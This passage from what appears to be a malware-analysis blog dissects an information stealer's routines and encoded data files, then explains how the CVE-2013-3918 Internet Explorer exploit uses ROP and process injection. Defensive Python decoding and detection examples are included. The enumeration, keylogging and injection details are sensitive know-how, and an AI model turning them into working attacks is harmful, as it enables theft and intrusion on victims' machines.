<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-UZGEGBTY7zt1hCf8uB7gI89Nkum-JIfK7OKGbAG5Rh8dJ1pb8dtad8W80qcgOZS92d9gdN8ftqbkLHew5YSnNztpayhsIfAhSDrkThR747DILRGiQTZzE3ceaWQ4AHcDb-lpQjl/s1600/routine_67.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT-UZGEGBTY7zt1hCf8uB7gI89Nkum-JIfK7OKGbAG5Rh8dJ1pb8dtad8W80qcgOZS92d9gdN8ftqbkLHew5YSnNztpayhsIfAhSDrkThR747DILRGiQTZzE3ceaWQ4AHcDb-lpQjl/s320/routine_67.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22e: Routine 67h, the keylogger.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">6Ah @ 0x100057F5: Enumerate windows</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKCgwgJpAp8hrUAlPvI0jcaBdqGFksDsqQ_gM0UNdNkJHQw8cDzjWgP1WlbxYiEy-YB83jIr0cn6lADMd_9ybsAmgT1b-MUMO3KTJXcEIeqFIHuqaC8odA2M06iDliIsBwOKo3SPfY/s1600/routine_6a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKCgwgJpAp8hrUAlPvI0jcaBdqGFksDsqQ_gM0UNdNkJHQw8cDzjWgP1WlbxYiEy-YB83jIr0cn6lADMd_9ybsAmgT1b-MUMO3KTJXcEIeqFIHuqaC8odA2M06iDliIsBwOKo3SPfY/s320/routine_6a.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22f: Routine 6Ah, windows enumeration.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">6Bh @ 0x10005D06: Network file, shares and connection enumeration</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhBXhChKbfS6sCD6dhEzoUndz8THn5fbviUwh4mS9fG3ZOTbeuHZS1m7KCG1zZg7oSs2M-pSayVLxd7MbfRVqpuzJxk7-TiTxOjDPBizodP97L0sJ-6KprSl8uW8Ui2FlvbxDgJEu/s1600/routine_6b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhBXhChKbfS6sCD6dhEzoUndz8THn5fbviUwh4mS9fG3ZOTbeuHZS1m7KCG1zZg7oSs2M-pSayVLxd7MbfRVqpuzJxk7-TiTxOjDPBizodP97L0sJ-6KprSl8uW8Ui2FlvbxDgJEu/s320/routine_6b.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22g: Routine 6Bh, network share enumeration.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">6Dh @ 0x100069E5: List available files on all drives.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4JVQOmKxcKe6ntbRo5We01No7mG84eP3hD2XMA0c6BTJ3Vt0IFmQiHNadkfMPoyVmRbFMISqMq6bCw9p_nk99hxTDMkfEeJxwWTllhfHeQ0vmJVMMWfLHEtKniltGvjx4mfIPUEf_/s1600/routine_6d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4JVQOmKxcKe6ntbRo5We01No7mG84eP3hD2XMA0c6BTJ3Vt0IFmQiHNadkfMPoyVmRbFMISqMq6bCw9p_nk99hxTDMkfEeJxwWTllhfHeQ0vmJVMMWfLHEtKniltGvjx4mfIPUEf_/s320/routine_6d.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22h: Routine 6Dh, list all files on all drives.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<br /></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 41pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">6Eh @ 0x10006CF5: List all servers visible in the domain.</span></div>
</li>
</ul>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHb_mvVgB5JfRBraxU8A8cEJnr0zn-ARguzDeVg0Z59Gn-L_WL4fjwoQIXre_3ywpCq085jHXvqRmcHs46_VHk0THE8BiJXw5QUsJ_wGptrm-E6VUPB0uH0X6391UCJRXUJiArN4hyphenhyphen/s1600/routine_6e.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHb_mvVgB5JfRBraxU8A8cEJnr0zn-ARguzDeVg0Z59Gn-L_WL4fjwoQIXre_3ywpCq085jHXvqRmcHs46_VHk0THE8BiJXw5QUsJ_wGptrm-E6VUPB0uH0X6391UCJRXUJiArN4hyphenhyphen/s320/routine_6e.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 22i: Routine 6Eh, enumerate servers visible in the domain.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Remember resource #201? It is decrypted in memory and serves as the default configuration file, which determines which stealing routines are executed. The decryption routine is clearly seen in Figure 23a.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrE5juNnhfa9GyIhBQZELYgablWTmQOwsi0tNV3bP5prZ5OXumpCmmgoLEGGjS5Ef8OtCC9S7usgocG02XXacRVzrMbcYYkV0sil0aOzIgQo-m2CBCMS2HW3YhaSJDMWm5xtoaNJO6/s1600/dec_config_file.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrE5juNnhfa9GyIhBQZELYgablWTmQOwsi0tNV3bP5prZ5OXumpCmmgoLEGGjS5Ef8OtCC9S7usgocG02XXacRVzrMbcYYkV0sil0aOzIgQo-m2CBCMS2HW3YhaSJDMWm5xtoaNJO6/s320/dec_config_file.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 23a: Decrypting config file located in resource #201.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The decrypted configuration file can be seen in Figure 23b; the stealing routines are highlighted in red.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL7LZ-_aGFT0y03cRoHpV_idyu4acjZOFDKQceZ2z4J-RVfvjCz7ZDFbMzKbmqmvXWUecA_SD39ozPJR-FjXZrRuHOCH7j0laSm38gaL0f577lFc3qdBq6n9cGPrKeNTHH_mzX5u05/s1600/dec_rsrc201.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL7LZ-_aGFT0y03cRoHpV_idyu4acjZOFDKQceZ2z4J-RVfvjCz7ZDFbMzKbmqmvXWUecA_SD39ozPJR-FjXZrRuHOCH7j0laSm38gaL0f577lFc3qdBq6n9cGPrKeNTHH_mzX5u05/s320/dec_rsrc201.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 23b: Decrypted resource #201 which serves as the default config file.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Based on its default configuration file it uses 8 of the 9 listed routines: 65h, 66h, 68h, 69h, 67h, 6Ah, 6Bh and 6Dh, in that sequence. All stolen data is then compressed with the bzip2 algorithm before being written to a ~DQxx.tmp file. The tmp file carries the string “AEh91AY&SY” in place of the standard bzip2 stream marker “BZh91AY&SY”, so the file is not recognised as bzip2 data without restoring the marker.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJeqjvBAT6sJbk2gIp1yZZtc8MGmAXiqKFyH9UtQoobnPzOt-iJLO3lqHkSQ-zIZIAxQPrGV3QFoP19DHta-PsORyXfSdPlU6yeWimfCdLkAaC0IiU01syJlXgbdvh-QfIiiI6kOWC/s1600/mod_bzip2_marker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJeqjvBAT6sJbk2gIp1yZZtc8MGmAXiqKFyH9UtQoobnPzOt-iJLO3lqHkSQ-zIZIAxQPrGV3QFoP19DHta-PsORyXfSdPlU6yeWimfCdLkAaC0IiU01syJlXgbdvh-QfIiiI6kOWC/s320/mod_bzip2_marker.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 24: Modified AEh91AY&SY marker instead of the default BZh91AY&SY by bzip2.</i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">A sample of the encrypted stolen data and its decrypted counterpart is shown below. Once fully decrypted, it reveals a list of running processes with their PIDs and account ids.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGHdp7OTHLzRdTf_fWUoIPGTsVvCLkZQKkZg0p8-w4plkXYJk4SQzrNBWAR_6HjKmjNcVstjFe7VqtrgeFDAEw58J-Fwf0rBtOwAYNk0fQl2ymHNPU_nzo2ae-EB_zFkuOkbTUpWUE/s1600/sample_data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGHdp7OTHLzRdTf_fWUoIPGTsVvCLkZQKkZg0p8-w4plkXYJk4SQzrNBWAR_6HjKmjNcVstjFe7VqtrgeFDAEw58J-Fwf0rBtOwAYNk0fQl2ymHNPU_nzo2ae-EB_zFkuOkbTUpWUE/s320/sample_data.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 25: Left side encrypted bzip2 data, Right side decrypted data.</i></span></span></div>
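<div style="text-align: justify;">
An added example, not code from the original post, showing how an analyst can recover data from such a ~DQxx.tmp file: the modified “AEh” marker is swapped back to the standard “BZh” bzip2 marker and the stream is handed to Python's bz2 module. The marker strings come from the analysis above; the compressed sample and its process-list content are constructed here, and the carving regex assumes the block magic “1AY&SY” follows the block-size digit as in an ordinary bzip2 stream.</div>

```python
import bz2
import re

# Markers from the analysis: a bzip2 stream starts with "BZh", the block-size
# digit 1-9 and the block magic 0x314159265359 ("1AY&SY"); the sample overwrites
# "BZ" with "AE" before writing the data to its ~DQxx.tmp file.
BZIP2_MAGIC = b"BZh"
MODIFIED_MAGIC = b"AEh"
MODIFIED_STREAM_RE = re.compile(rb"AEh[1-9]1AY&SY")


def find_modified_streams(data: bytes) -> list:
    """Return the offsets of every modified bzip2 stream header found in data.

    Useful for carving when the tmp file holds more than one compressed
    stream or has leading junk."""
    return [m.start() for m in MODIFIED_STREAM_RE.finditer(data)]


def restore_bzip2_header(blob: bytes) -> bytes:
    """Swap the "AEh" marker back to "BZh" so standard bzip2 tools accept the stream.

    A blob that already carries the genuine marker is returned unchanged;
    anything else is rejected rather than guessed at."""
    if blob.startswith(BZIP2_MAGIC):
        return blob
    if blob.startswith(MODIFIED_MAGIC):
        return BZIP2_MAGIC + blob[len(MODIFIED_MAGIC):]
    raise ValueError("no bzip2 marker (BZh or AEh) at offset 0")


def decode_stolen_data(blob: bytes) -> bytes:
    """Restore the header and decompress; bz2 raises OSError if the stream is corrupt."""
    return bz2.decompress(restore_bzip2_header(blob))


def make_constructed_sample(plaintext: bytes) -> bytes:
    """Build a test blob the way the sample does: bzip2-compress, then overwrite
    the marker. Constructed for this example only."""
    compressed = bz2.compress(plaintext, compresslevel=9)
    return MODIFIED_MAGIC + compressed[len(BZIP2_MAGIC):]


# Constructed stand-in for the routine 65h output (process list with PIDs and
# account ids); the real content is what Figure 25 shows.
SAMPLE_PLAINTEXT = (
    b"PID 4 System\r\n"
    b"PID 1396 explorer.exe user\r\n"
    b"PID 2048 iexplore.exe user\r\n"
)
SAMPLE_TMP = make_constructed_sample(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("modified stream offsets:", find_modified_streams(SAMPLE_TMP))
    print(decode_stolen_data(SAMPLE_TMP).decode())
```

<div style="text-align: justify;">
Only the first two bytes differ from a genuine stream, so a byte-level check for “AEh” followed by the block magic is also a cheap file-content signature for this family's temp files.</div>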
<div align="right" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i><br /></i></b></span></span></div>
<div align="right" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i><br /></i></b></span></span></div>
<div align="right" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><b><i>Analysis and Documentation Prepared By:</i></b></span></span></div>
<div align="right" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Christopher D. Del Fierro</i></span></span></div>
CVE 2013 3918 - Another zero day? (posted 2013-11-13, updated 2013-11-18)
<div style="text-align: justify;">
Another HTML exploit surfaced and made a scene in the AV industry in November 2013. It takes advantage of a vulnerability in an ActiveX component of Internet Explorer that allows code execution when a user views a specially crafted web page. Details on the vulnerability can be found on this <a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-090" target="_blank">Microsoft website</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
ThreatTrack's <i>Vipre 2013</i> detects this as Lookslike.HTML.CVE-2013-3918.a</div>
<div style="text-align: justify;">
<br />
The exploit uses a technique known as ROP (return-oriented programming), which lets it run its payload even though the memory areas it controls are non-executable. Once the vulnerability is triggered, it deliberately swaps the stack and heap addresses and changes the memory protection so that it can execute its shellcode. </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUiU3VeGYIx4ziQe6wIJEQJxLrLbnFbh9Ft3P2PJ8JTxF2At5dpSuVvQO69FvSdfWHC3nYJaOKG1phZKCa4HhEpxVBaNvkukBUE-10cxmiVwMh4yqPEoYSklTK4PS8aG0_u5_LWANNMI4/s1600/overlfow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUiU3VeGYIx4ziQe6wIJEQJxLrLbnFbh9Ft3P2PJ8JTxF2At5dpSuVvQO69FvSdfWHC3nYJaOKG1phZKCa4HhEpxVBaNvkukBUE-10cxmiVwMh4yqPEoYSklTK4PS8aG0_u5_LWANNMI4/s400/overlfow.jpg" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<i>ROP in action</i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In order for the shellcode to execute, it changes the memory protection of the said area using VirtualProtect.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVcj_Ry7F3Twg8XLpAi7RpJfveziA6pXR6492-w9ObgLUnzWqN9HGmiBOu-G6x-6hTEVdZ7egBWI8Lix1dY3Sd_M16NJaS-xk6eAE5WOl02x_AXWlxUOEIlVw2pCIrajaFfWOk4s2-Fyg/s1600/virtualprotectstack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVcj_Ry7F3Twg8XLpAi7RpJfveziA6pXR6492-w9ObgLUnzWqN9HGmiBOu-G6x-6hTEVdZ7egBWI8Lix1dY3Sd_M16NJaS-xk6eAE5WOl02x_AXWlxUOEIlVw2pCIrajaFfWOk4s2-Fyg/s400/virtualprotectstack.jpg" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<i>Changes protection level of memory </i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Once everything is in order, it passes execution to the part of its shellcode that decrypts and resolves the APIs it needs to inject itself into another process: </div>
<div style="text-align: left;">
<br /></div>
<ul>
<li>LoadLibraryA</li>
<li>Winexec</li>
<li>CreateThread</li>
<li>OpenProcess</li>
<li>CreateProcessA</li>
<li>VirtualAllocEx</li>
<li>WriteProcessMemory</li>
<li>CreateRemoteThread</li>
</ul>
<br />
<div style="text-align: left;">
It uses the said APIs to create a process named "rundll32" under Internet Explorer, writes another section of its shellcode into it and activates that code using the CreateRemoteThread API. It's interesting to note that it covers itself with multiple layers of encryption and employs multiple jumps in memory to avoid easy detection.</div>
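The two behaviours just described, a VirtualProtect call that turns stack or heap pages executable and the VirtualAllocEx / WriteProcessMemory / CreateRemoteThread chain aimed at a freshly spawned rundll32, are exactly what a sandbox or EDR rule would key on. The Python below is an added detection example, not code from the post or from the exploit: it parses a constructed API-call trace in a made-up "pid image api(key=value,...)" format, uses a constructed per-process memory map standing in for what a sandbox would record via VirtualQuery, and emits one alert per behaviour. Field names, addresses and PIDs are assumptions.

```python
"""Added detection example over a constructed sandbox-style API trace.
Log format, memory map, addresses and PIDs are assumptions for illustration."""
import re
from collections import defaultdict

# Win32 page-protection constants that grant execute rights.
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTABLE_MASK = (PAGE_EXECUTE | PAGE_EXECUTE_READ
                   | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)

# Constructed memory map per PID: (start, end, kind). A real sandbox would
# record this with VirtualQuery at the time of the call.
MEMORY_MAP = {
    1234: [(0x00180000, 0x00190000, "stack"),
           (0x00400000, 0x00500000, "image"),
           (0x02000000, 0x03000000, "heap")],
}

# Constructed trace in a made-up "pid image api(key=value,...)" format.
SAMPLE_TRACE = """\
1234 iexplore.exe VirtualProtect(addr=0x0018f000,size=0x1000,newprot=0x40)
1234 iexplore.exe CreateProcessA(image=rundll32.exe,pid=4321)
1234 iexplore.exe VirtualAllocEx(pid=4321,addr=0x00a00000,size=0x2000,prot=0x40)
1234 iexplore.exe WriteProcessMemory(pid=4321,addr=0x00a00000,size=0x1f00)
1234 iexplore.exe CreateRemoteThread(pid=4321,start=0x00a00000)
5678 notepad.exe VirtualProtect(addr=0x00401000,size=0x1000,newprot=0x20)
"""

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<image>\S+)\s+(?P<api>\w+)\((?P<args>[^)]*)\)$")
INJECTION_STEPS = {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}


def parse_line(line):
    """Parse one trace line into a dict, converting numeric arguments to int."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = {}
    for kv in filter(None, m.group("args").split(",")):
        key, value = kv.split("=", 1)
        is_number = re.fullmatch(r"(0x[0-9a-fA-F]+|\d+)", value) is not None
        args[key] = int(value, 0) if is_number else value
    return {"pid": int(m.group("pid")), "image": m.group("image"),
            "api": m.group("api"), "args": args}


def region_kind(memory_map, pid, addr):
    """Classify an address as stack/heap/image using the recorded memory map."""
    for start, end, kind in memory_map.get(pid, []):
        if start <= addr < end:
            return kind
    return "unknown"


def detect(trace, memory_map=MEMORY_MAP):
    """Return alert strings for (1) stack/heap pages made executable and
    (2) the allocate/write/remote-thread chain against one target PID."""
    alerts = []
    spawned = {}                    # (parent pid, child pid) -> child image
    steps_seen = defaultdict(set)   # (actor pid, target pid) -> APIs used
    for line in trace.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        pid, api, a = ev["pid"], ev["api"], ev["args"]
        if api == "VirtualProtect" and a["newprot"] & EXECUTABLE_MASK:
            kind = region_kind(memory_map, pid, a["addr"])
            if kind in ("stack", "heap"):
                alerts.append("pid %d (%s): %s page 0x%08x made executable"
                              % (pid, ev["image"], kind, a["addr"]))
        elif api == "CreateProcessA":
            spawned[(pid, a["pid"])] = a["image"]
        elif api in INJECTION_STEPS:
            steps_seen[(pid, a["pid"])].add(api)
    for (actor, target), steps in steps_seen.items():
        if steps >= INJECTION_STEPS:
            image = spawned.get((actor, target), "unknown image")
            alerts.append("pid %d: remote thread injection into pid %d (%s)"
                          % (actor, target, image))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_TRACE):
        print(alert)
```

The notepad line is deliberately benign: an executable protection on an image page is normal (JIT engines and packers do it), so the rule only fires when the target page lies in a stack or heap region, which is where the pivot described above lands.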
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4gcc7YndWnBGOSyu2wfIzyEF-X6Rm45C73eqJkJW6Z4viULwuxo-NXbFjM31Kn18BpGLU5OJHUsSkMmISWgSmoszxHPgzrHaowyyoYPSJ478d_6wEEr3EGnN8q3drVhpSqv2Ts3PlAl4/s1600/initialdecrypt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4gcc7YndWnBGOSyu2wfIzyEF-X6Rm45C73eqJkJW6Z4viULwuxo-NXbFjM31Kn18BpGLU5OJHUsSkMmISWgSmoszxHPgzrHaowyyoYPSJ478d_6wEEr3EGnN8q3drVhpSqv2Ts3PlAl4/s400/initialdecrypt.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>An example of decrypting code</i></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX_poW0ScpwgaCIBydKePEs2LIFDyaKd-6zTK0qssUlrQCQxoWxahT7GrLSKZXNV7GD7tbrrE6Dkt4jDkxzKjniyR0r8MCdqlIqC-r4YsePJrrl6AkmNj0WgjM0wZ_ONgQA7c8UvE5q8w/s1600/anotherdecrypt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX_poW0ScpwgaCIBydKePEs2LIFDyaKd-6zTK0qssUlrQCQxoWxahT7GrLSKZXNV7GD7tbrrE6Dkt4jDkxzKjniyR0r8MCdqlIqC-r4YsePJrrl6AkmNj0WgjM0wZ_ONgQA7c8UvE5q8w/s320/anotherdecrypt.jpg" width="320" /></a></div>
<div style="text-align: center;">
<i>Decryption in rundll32</i></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Another interesting feature of this payload is the way it calls the APIs it needs. It initially sets up a jump table that points to a single function which performs the call (<i>specifically a jmp</i>), varying only in the values it pushes. It is highly likely that it uses this calling method to prevent researchers from easily identifying the calls it makes and quickly analyzing the contents of its body.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
